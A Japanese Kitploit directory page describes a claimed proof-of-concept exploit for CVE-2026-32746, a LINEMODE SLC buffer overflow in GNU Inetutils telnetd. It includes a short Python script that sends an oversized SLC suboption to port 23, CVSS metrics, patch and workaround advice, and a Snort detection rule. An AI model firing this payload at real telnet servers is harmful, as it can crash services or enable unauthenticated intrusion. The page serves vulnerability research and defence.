Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-32746 — # CVE-2026-32746 の概念実証エクスプロイト GNU Inetutils の telnetd における LINEMODE SLC バッファオーバーフローを介した重大なリモートコード実行の脆弱性に対する概念実証エクスプロイトです。技術分析、CVSS メトリクス、および緩和策のガイダンスを含みます。 | Kitploit
ツール/GitHubGitHub/kaleth4/cve-2026-32746
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

# CVE-2026-32746 の概念実証エクスプロイト GNU Inetutils の telnetd における LINEMODE SLC バッファオーバーフローを介した重大なリモートコード実行の脆弱性に対する概念実証エクスプロイトです。技術分析、CVSS メトリクス、および緩和策のガイダンスを含みます。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 エグゼクティブサマリー

重大な脆弱性 | CVSS 9.8 | リモートコード実行! 影響: GNU Inetutils Telnetd (2.7より前のバージョン) 種別: LINEMODE SLC サブオプションハンドラにおける OOB Write 攻撃ベクトル: ネットワーク (ポート23) | 認証不要 影響: Telnetdプロセスの権限でのRCE


🎯 📖 技術的説明

GNU Inetutils の telnetd デーモン内の add_slc 関数において、バッファオーバーフローによる領域外書き込み (OOB Write) が特定されました。この欠陥により、リモートの攻撃者が Telnet プロトコルの を操作することで、 することが可能になります。

SLC (Set Local Characters) サブオプション
任意のコードを注入

🔍 主要な詳細

  • 脆弱な関数: add_slc (ローカル文字の処理)。
  • 根本原因: 内部バッファにおける 境界チェックの欠如。
  • 悪用方法: 悪意のある LINEMODE SLC シーケンスの大量送信。
  • 必要条件: なし (ポート23への直接アクセス)。

🛠️ 💻 概念実証 (PoC)

攻撃者は、内部バッファを飽和させる 悪意のある Telnet ペイロード を使用して、この脆弱性を悪用できます:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ 警告! このコードは 教育および研究目的のみ です。許可なくシステムで使用することは 違法 です。


📊 📈 リスクメトリクス (CVSS 3.1)

メトリクス値説明
ベクターAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hリモート、認証不要
スコア9.8 (CRITICAL) 🔴機密性、完全性、可用性への高い影響
公開日2026年3月13日最終更新: 2026年5月5日

🛡️ 🔒 緩和策と解決策

🚀 即時対応

✅ GNU Inetutils を パッチ適用済みバージョン (2.7以降) に更新する。

⚡ 回避策

🔹 telnetd を無効化 し、SSH に移行する (推奨)。 🔹 ファイアウォールでポート23をブロック する。 🔹 IDS/IPSを設定 して、異常な LINEMODE SLC シーケンスを検出する。

🛡️ 追加のセキュリティ設定

  • Snort/Suricata ルール:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
ツールをダウンロード